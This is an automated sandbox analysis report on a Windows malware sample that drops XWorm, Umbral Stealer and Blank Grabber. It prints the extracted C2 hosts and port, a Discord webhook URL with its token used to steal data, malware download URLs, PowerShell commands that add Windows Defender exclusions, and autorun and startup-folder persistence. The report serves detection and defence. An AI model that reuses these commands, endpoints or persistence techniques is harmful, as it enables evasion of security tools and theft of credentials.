Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
8Hd0ZExgJz.exe

Overview

General Information

Sample name:8Hd0ZExgJz.exe
renamed because original name is a hash value
Original sample name:073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe
Analysis ID:1556022
MD5:7198fa10a50ea9aaf6ae5c2a05af2104
SHA1:c35a2a73313e3c5ad08136e3bc583bb9bc26964c
SHA256:073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce
Tags:exeuser-Chainskilabs
Infos:

Detection

Blank Grabber, Umbral Stealer, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Blank Grabber
Yara detected Powershell download and execute
Yara detected Umbral Stealer
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Drops PE files to the user root directory
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Uses ipconfig to lookup or modify the Windows network settings
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Use Short Name Path in Command Line
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 8Hd0ZExgJz.exe (PID: 6440 cmdline: "C:\Users\user\Desktop\8Hd0ZExgJz.exe" MD5: 7198FA10A50EA9AAF6AE5C2A05AF2104)
    • Injector.exe (PID: 2404 cmdline: "C:\Users\user~1\AppData\Local\Temp\Injector.exe" MD5: 3882CFE50E35985982E9EF0C01B99C47)
      • WMIC.exe (PID: 1456 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Windows Security Host.exe (PID: 6296 cmdline: "C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe" MD5: C7BA63CE2ED6D0AAB93AD839E0EDDD68)
      • powershell.exe (PID: 5112 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7544 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7864 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Windows Security Host.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8156 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • BootstrapperV1.23.exe (PID: 4064 cmdline: "C:\Users\user~1\AppData\Local\Temp\BootstrapperV1.23.exe" MD5: 02C70D9D6696950C198DB93B7F6A835E)
      • conhost.exe (PID: 6356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7144 cmdline: "cmd" /c ipconfig /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 1708 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
      • WerFault.exe (PID: 7524 cmdline: C:\Windows\system32\WerFault.exe -u -p 4064 -s 2188 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • Windows Security Host.exe (PID: 608 cmdline: "C:\Users\user\Windows Security Host.exe" MD5: C7BA63CE2ED6D0AAB93AD839E0EDDD68)
  • Windows Security Host.exe (PID: 1316 cmdline: "C:\Users\user\Windows Security Host.exe" MD5: C7BA63CE2ED6D0AAB93AD839E0EDDD68)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["127.0.0.1", "23.ip.gl.ply.gg"], "Port": 26848, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Threatname: Umbral Stealer

{"C2 url": "https://discord.com/api/webhooks/1303474825066446879/NebQ1EAeNBTUfzGkn_W4tnvKCl9pOSQ87UqZdaxri0p165SfLuSuU_8R57ng1lqsCx6o", "Version": "v1.3"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
\Device\ConDrvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    C:\Users\user\AppData\Local\Temp\Windows Security Host.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Local\Temp\Windows Security Host.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x11854:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x118f1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x11a06:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x108c6:$cnc4: POST / HTTP/1.1
      C:\Users\user\Windows Security Host.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\Windows Security Host.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x11854:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x118f1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x11a06:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x108c6:$cnc4: POST / HTTP/1.1
        Click to see the 3 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000000.00000002.1259484875.00000000026B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          00000000.00000002.1259484875.00000000026B1000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x3c3c4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x56644:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x3c461:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x566e1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x3c576:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x567f6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x3b436:$cnc4: POST / HTTP/1.1
          • 0x556b6:$cnc4: POST / HTTP/1.1
          00000003.00000000.1257101643.0000000000452000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000003.00000000.1257101643.0000000000452000.00000002.00000001.01000000.00000007.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x11654:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x116f1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x11806:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x106c6:$cnc4: POST / HTTP/1.1
            00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              Click to see the 7 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.8Hd0ZExgJz.exe.26f5df0.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
                0.2.8Hd0ZExgJz.exe.26f5df0.1.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0xfa54:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0xfaf1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0xfc06:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0xeac6:$cnc4: POST / HTTP/1.1
                0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                  • 0x11854:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                  • 0x118f1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                  • 0x11a06:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                  • 0x108c6:$cnc4: POST / HTTP/1.1
                  3.0.Windows Security Host.exe.450000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                    Click to see the 4 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, ParentProcessId: 6296, ParentProcessName: Windows Security Host.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', ProcessId: 5112, ProcessName: powershell.exe
                    Sigma detected: Script Interpreter Execution From Suspicious Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, ParentProcessId: 6296, ParentProcessName: Windows Security Host.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', ProcessId: 5112, ProcessName: powershell.exe
                    Sigma detected: Suspicious Script Execution From Temp Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, ParentProcessId: 6296, ParentProcessName: Windows Security Host.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', ProcessId: 5112, ProcessName: powershell.exe
                    Sigma detected: Change PowerShell Policies to an Insecure Level
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, ParentProcessId: 6296, ParentProcessName: Windows Security Host.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', ProcessId: 5112, ProcessName: powershell.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Windows Security Host.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, ProcessId: 6296, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security Host
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, ParentProcessId: 6296, ParentProcessName: Windows Security Host.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', ProcessId: 5112, ProcessName: powershell.exe
                    Sigma detected: Startup Folder File Write
                    Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, ProcessId: 6296, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Host.lnk
                    Sigma detected: Use Short Name Path in Command Line
                    Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\Injector.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\Injector.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\Injector.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\Injector.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\Injector.exe, ParentCommandLine: "C:\Users\user\Desktop\8Hd0ZExgJz.exe", ParentImage: C:\Users\user\Desktop\8Hd0ZExgJz.exe, ParentProcessId: 6440, ParentProcessName: 8Hd0ZExgJz.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\Injector.exe" , ProcessId: 2404, ProcessName: Injector.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, ParentProcessId: 6296, ParentProcessName: Windows Security Host.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe', ProcessId: 5112, ProcessName: powershell.exe
                    Sigma detected: Suspicious Network Command
                    Source: Process startedAuthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: "cmd" /c ipconfig /all, CommandLine: "cmd" /c ipconfig /all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\BootstrapperV1.23.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe, ParentProcessId: 4064, ParentProcessName: BootstrapperV1.23.exe, ProcessCommandLine: "cmd" /c ipconfig /all, ProcessId: 7144, ProcessName: cmd.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-14T20:14:06.891834+010028033053Unknown Traffic192.168.2.749703104.21.93.27443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: 8Hd0ZExgJz.exeAvira: detected
                    Antivirus detection for URL or domain
                    Source: https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zipAvira URL Cloud: Label: malware
                    Source: https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exeAvira URL Cloud: Label: malware
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeAvira: detection malicious, Label: TR/Spy.Gen
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeAvira: detection malicious, Label: HEUR/AGEN.1307507
                    Source: C:\Users\user\Windows Security Host.exeAvira: detection malicious, Label: TR/Spy.Gen
                    Found malware configuration
                    Source: 00000023.00000002.2035089860.00000000032B1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["127.0.0.1", "23.ip.gl.ply.gg"], "Port": 26848, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                    Source: 2.0.Injector.exe.242bb8d0000.0.unpackMalware Configuration Extractor: Umbral Stealer {"C2 url": "https://discord.com/api/webhooks/1303474825066446879/NebQ1EAeNBTUfzGkn_W4tnvKCl9pOSQ87UqZdaxri0p165SfLuSuU_8R57ng1lqsCx6o", "Version": "v1.3"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeReversingLabs: Detection: 28%
                    Multi AV Scanner detection for submitted file
                    Source: 8Hd0ZExgJz.exeReversingLabs: Detection: 60%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Windows Security Host.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: 8Hd0ZExgJz.exeJoe Sandbox ML: detected
                    Sample uses string decryption to hide its real strings
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpackString decryptor: 127.0.0.1,23.ip.gl.ply.gg
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpackString decryptor: 26848
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpackString decryptor: <123456789>
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpackString decryptor: <Xwormmm>
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpackString decryptor: XWorm V5.6
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpackString decryptor: USB.exe
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpackString decryptor: %Userprofile%
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpackString decryptor: Windows Security Host.exe
                    Source: 8Hd0ZExgJz.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.7:49700 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.7:49703 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 128.116.123.3:443 -> 192.168.2.7:49704 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.22.46:443 -> 192.168.2.7:49706 version: TLS 1.2
                    Source: 8Hd0ZExgJz.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: System.Runtime.Serialization.ni.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Data.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: m.pdbE source: BootstrapperV1.23.exe, 00000004.00000002.1620001182.000001EFAF449000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Xml.ni.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.ni.pdbRSDS source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96E0C000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Windows.Forms.ni.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Drawing.ni.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbdllG source: BootstrapperV1.23.exe, 00000004.00000002.1620001182.000001EFAF3B0000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Configuration.ni.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Drawing.pdbX`h source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Configuration.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Data.ni.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Data.ni.pdbRSDSC source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Drawing.ni.pdbRSDS source: WERAD5E.tmp.dmp.23.dr
